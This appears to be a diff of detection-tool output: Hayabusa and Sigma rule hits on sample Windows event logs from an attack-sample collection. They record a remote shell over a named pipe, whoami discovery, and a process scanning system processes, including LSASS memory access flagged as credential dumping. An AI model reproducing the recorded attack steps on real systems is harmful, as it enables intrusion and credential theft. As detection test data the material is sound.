+2019-04-30 05:59:14.447 +09:00,IEWIN7,18,info,,Pipe Connected,\46a676ab7f179e511e30dd2dc41bd388 | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Evas | PrivEsc,Malicious Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:15.575 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.17:63025 (NLLT106876) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x10896 | PID: 3376 | PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3940 | Src PGUID: 365ABB72-6231-5CC7-0000-00104CF71800 | Tgt PID: 3376 | Tgt PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,10,low,,Process Access,Src Process: io\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3376 | Src PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400 | Tgt PID: 2116 | Tgt PGUID: 365ABB72-65AA-5CC7-0000-00104D882400,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | LID: 0x10896 | PID: 2116 | PGUID: 365ABB72-65AA-5CC7-0000-00104D882400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:55.472 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x10896 | PID: 2244 | PGUID: 365ABB72-65CB-5CC7-0000-001002202600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 16:22:56.571 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Temp\opera autoupdate\installer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 2784 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010CB280E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:22:56.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:22:57.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3624 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.883 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-F69F-5CC7-0000-0010132B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001033480000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A74B0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00103F4C0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001043520000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001004550000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001072590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 500 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A3590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 616 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010BB700000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxService.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 676 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010E7AC0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 740 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00101AB00000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 804 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00105FB40000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 872 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001015C00000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 908 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010A7C40000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 956 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001014C90000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1016 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001012CF0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1148 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010F9D80000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\spoolsv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1288 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00100EED0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1328 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-0010B8F20000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1476 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010D30E0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1504 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-001062120100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1572 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010051A0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\bin\cygrunsrv.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1732 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010443A0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1904 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-0010F7500100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\OpenSSH\usr\sbin\sshd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1952 | Tgt PGUID: 365ABB72-F6A3-5CC7-0000-00108A560100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wlms\wlms.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1996 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-0010C65F0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
